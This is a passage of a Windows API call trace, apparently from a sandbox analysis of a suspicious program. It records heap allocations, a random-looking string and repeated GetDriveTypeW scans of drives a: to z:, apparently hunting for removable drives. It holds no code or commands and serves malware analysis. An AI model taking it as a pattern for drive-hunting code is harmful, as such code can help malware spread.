(HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.369] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0206.369] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e2c0 | out: hHeap=0x12c0000) returned 1 [0206.369] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.370] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.370] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0206.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0206.370] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0206.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.370] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.371] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0206.371] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0206.371] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.371] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.371] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.371] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.371] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.372] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.372] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.372] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.372] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.372] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.372] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.373] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.373] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.373] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.373] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.373] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.373] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.374] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.374] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.374] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.374] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.374] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.374] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.374] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.375] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.375] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.375] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.375] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0206.375] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.375] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0206.376] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.376] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0206.376] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0206.377] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0206.377] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.377] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.377] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0206.377] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0206.378] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.378] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.378] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.378] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.378] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.378] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0206.378] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.378] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.378] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.379] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.379] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.379] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.379] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.379] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.379] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.379] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.380] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.380] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.380] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.380] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.380] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.380] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.380] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.381] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.381] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.381] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.381] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.381] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.382] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.382] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.382] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.382] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.382] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.382] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.383] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0206.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0206.384] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e440 | out: hHeap=0x12c0000) returned 1 [0206.384] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.384] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.384] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0206.385] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0206.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.385] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.385] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.385] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.385] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.385] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.385] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.386] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.386] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.386] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.386] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.386] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.386] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.387] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.387] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.387] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.387] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.387] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.387] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.388] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.388] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.388] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.388] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.388] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.388] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.389] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.389] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.389] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.389] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.389] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.390] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.390] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.390] HeapFree (in: 